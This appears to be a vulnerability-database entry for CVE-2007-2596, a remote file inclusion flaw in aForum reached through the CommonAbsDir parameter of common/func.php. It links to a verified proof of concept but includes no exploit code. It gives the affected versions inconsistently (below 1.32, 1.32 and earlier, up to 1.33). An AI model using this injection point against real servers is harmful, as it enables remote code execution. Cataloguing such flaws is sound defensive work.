CVE-2007-2596

aForum < 1.32 - Remote File Inclusion via CommonAbsDir Parameter

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2007-2596. PoCs published by ThE TiGeR.

AI-analyzed exploit summary This exploit demonstrates a Remote File Inclusion (RFI) vulnerability in AForum <=1.33 by manipulating the 'CommonAbsDir' parameter in 'func.php' to include a remote shell. The attack requires the target server to have 'allow_url_include' enabled in PHP.

Description

PHP remote file inclusion vulnerability in common/func.php in aForum 1.32 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the CommonAbsDir parameter.

Exploits (1)

exploitdb WORKING POC VERIFIED

by ThE TiGeR · textwebappsphp

https://www.exploit-db.com/exploits/3884

View Code ZIP pw:eip

This exploit demonstrates a Remote File Inclusion (RFI) vulnerability in AForum <=1.33 by manipulating the 'CommonAbsDir' parameter in 'func.php' to include a remote shell. The attack requires the target server to have 'allow_url_include' enabled in PHP.

Classification

Working Poc 90%

Attack Type

Rce

Complexity

Trivial

Reliability

Reliable

Target: AForum <=1.33

No auth needed

Prerequisites: PHP 'allow_url_include' enabled · Remote shell accessible via URL

MITRE ATT&CK